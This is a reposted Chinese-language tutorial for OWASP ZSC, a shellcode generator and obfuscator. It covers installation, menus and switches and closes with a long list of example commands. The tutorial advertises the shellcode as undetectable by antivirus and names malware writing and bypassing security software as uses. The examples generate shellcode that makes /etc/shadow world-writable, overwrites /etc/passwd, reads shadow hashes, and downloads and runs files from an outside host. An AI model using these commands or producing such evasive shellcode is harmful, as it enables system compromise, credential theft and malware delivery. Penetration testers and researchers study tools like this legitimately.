转载

OWASP ZSC Shellcoder：定制个人专属Shellcode

OWASP ZSC是一款用Python编写的开源软件，它可以帮助你在你的操作系统中生成自定义的Shellcode。

这款软件可以在 Windows/Linux&Unix/OSX以及其他操作系统下运行，前提是，你安装了Python 2.7.x。

Shellcode的用途

Shellcode可以用于软件开发的payload，还可以用于编写恶意软件、绕过安全防护软件、杀毒软件、代码混淆等。

代码混淆的用途

可以用于绕过杀毒软件、代码保护等。

为什么使用OWASP ZSC？

与其他像metasploit等shellcode产生工具不同，OWASP ZSC使用新的编码和方法，反病毒软件无法检测。

OWASP ZSC的编码可以产生带有随机编码的shellcode，让你立刻获得成千上万中进行同样工作的新的动态的shellcode，这就意味着如果你使用相同的命令行进行随机编码，你得到的代码会不一样。这个优点让OWASP ZSC成为了最受欢迎的工具！另外，在之后的版本中，它产生的shellcode还能用在更多的操作系统中。

安装

方法一

进入github下载页: https://github.com/Ali-Razmjoo/OWASP-ZSC 进行下载。

运行installer.py，之后你就可以用”zsc”命令启动这个工具啦，当然你也可以在不安装的情况下直接直接执行zsc.py。

方法二

wget https://github.com/Ali-Razmjoo/OWASP-ZSC/archive/master.zip -O owasp-zsc.zip && unzip owasp-zsc.zip && rm -rf owasp-zsc.zip && mv OWASP-ZSC-master owasp-zsc && cd owasp-zsc && python installer.py

注：使用uninstaller.py可以卸载这个工具

注：软件被安装在“/usr/share/owasp-zsc”目录下

OK，现在开始真正的使用教程

python zsc.py     ______          __      _____ _____    ___________ _____    / __ / /        / //    / ____|  __ /  |___  / ____|  __ /   | |  | / /  //  / /  /  | (___ | |__) |    / / |    | |__) |   | |  | |/ //  // / // /  /___ /|  ___/    / /| |    |  _  /   | |__| | /  //  / ____ / ____) | |       / /_| |____| | / /    /____/ _ // _//_/___ /_/_____/|_|  ____/_____/_____|_|__/_/_ _____    _    / ____| |  | |  ____| |    | |    / ____/ __ /|  __ /|  ____|  __ /  | |   | (___ | |__| | |__  | |    | |   | |   | |  | | |  | | |__  | |__) | | |    /___ /|  __  |  __| | |    | |   | |   | |  | | |  | |  __| |  _  /  | |    ____) | |  | | |____| |____| |___| |___| |__| | |__| | |____| | / /  |_|   |_____/|_|  |_|______|______|______/_____/____/|_____/|______|_|  /_/ (_)              OWASP ZeroDay Cyber Research Shellcoder  zsc>

下面的内容适用于Mac OSX:

输入help:

[+] shellcode     generate shellcode  [+] shellcode>generate    to generate shellcode  [+] shellcode>search    search for shellcode in shellstorm  [+] obfuscate     generate obfuscate code  [+] help          show help menu  [+] update        check for update  [+] about         about owasp zsc  [+] restart       restart the software  [+] version       software version  [+] exit          to exit the software

你是用这些命令时按下”tab”键进行选择。

输入”shellcode”生成shellcode，然后回车。

现在你可以输入generate或者search，或者download（生成shellcode、从shell库搜索或下载shellcode）。

搜索shellcode：输入search，然后回车

zsc/shellcode> search  keyword_to_search>

下载shellcode：输入download，然后回车

zsc/shellcode> download  shellcode_id>

生成shellcode：输入generate，然后回车

之后按tab键，你可以看到一个可用的操作系统列表。

然后再按一次tab键，你可以看到一些功能，比如“exec” ,”systm”,”write”等等，然后你可以选择你想使用的功能，然后回车。

下面，你要使用函数的argv，比如exec(“bin/bash”)，然后你只需要按下tab，然后回车，软件就会自动获取函数argv了。

填好argv，接下来软件会要求你输入shellcode类型，你可以写”none”或者选择上面编码类型的一个。输入，然后你的shellcode就准备好了。

还有一个方式获得shellcode就是使用sheestorm API。

输入shellcode后输入search搜索一个shellcode。你只用输入shellcode的名字、ID等信息就可以获得一个sheecode列表，然后你可以在shellcode之后输入download下载shellcode。你可以使用restart命令来重启软件并开始新的任务。

生成混淆代码

使用obfuscate命令，你可以开始进行代码混淆。同样，使用tab键，你可以看到一列已经可以进行代码混淆的语言。之后选择一种语言，软件会要求你输入文件名，这个文件就是你想要进行代码混淆的文件。接下来软件会要求你选择编码类型。还是tab键，你可以看到编码模块。然后轩儿编码类型，你就能获得被重写并转成你选择的编码类型的混淆代码了。别担心，你的源码其实还在文件里。

其他命令

help：显示帮助菜单  update：检查更新  about：关于owasp zsc  restart：重启软件  version：软件版本  exit：退出

如果你是用的是Linux kali，并且你是用的是1.0.6版本的ZSC那你需要下面的简易教程：

Switches:  -h, --h, -help, --help => to see this help guide  -os => choose your os to create shellcode  -oslist   => list os for switch -os  -o => output filename  -job => what shellcode gonna do for you ?  -joblist => list of -job switch  -encode => generate shellcode with encode  -types => types of encode for -encode switch  -wizard => wizard mod  -update => check for update  -about => about software and developers.

通过这些switch，你可以看到系统列表、编码类型和函数[joblist]来生成你的shellcode。

支持操作系统列表 “-oslist”

[+] linux_x86  [+] linux_x64  [+] linux_arm  [+] linux_mips  [+] freebsd_x86  [+] freebsd_x64  [+] windows_x86  [+] windows_x64  [+] osx  [+] solaris_x86  [+] solaris_x64

支持编码类型 “-types”

[+] none  [+] xor_random  [+] xor_yourvalue  [+] add_random  [+] add_yourvalue  [+] sub_random  [+] sub_yourvalue  [+] inc  [+] inc_timesyouwant  [+] dec  [+] dec_timesyouwant  [+] mix_all

支持函数 “-joblist”

[+] exec('/path/file')  [+] chmod('/path/file','permission number')  [+] write('/path/file','text to write')  [+] file_create('/path/file','text to write')  [+] dir_create('/path/folder')  [+] download('url','filename')  [+] download_execute('url','filename','command to execute')  [+] system('command to execute')  [+] script_executor('name of script','path and name of your script in your pc','execute command')

现在，你可以选择你所用的系统、函数和编码类型来生成你的shellcode了。但是现在其实没有启动所有功能，所以你要查看这个表，看看哪些功能被启用了、哪些没有。

OWASP ZSC Shellcoder：定制个人专属Shellcode

举个例子，这个表格会告诉我们linux_x86上的所有功能都已经被启动了，但是[xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] 智能开chmod()函数使用。

示例

>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file  >zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file  >zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file  >zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file  >zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt  >zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt  >zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt  >zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt  >zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt  >zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt  >zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt  >zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt  >zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt  >zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt  >zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt  >zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt  >zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt  #multi command  >zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt  >zsc -os linux_x86 -encode none -job "script_executor('script.type','D://myfile.type','./script.type')" -o file.txt  >zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt  >zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt  >zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt  >zsc -os linux_x86 -encode none -job "system('ls[space]-la')" -o file.txt  >zsc -os linux_x86 -encode none -job "system('ls[space]-la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt  >zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt  >zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt  >zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt  >zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt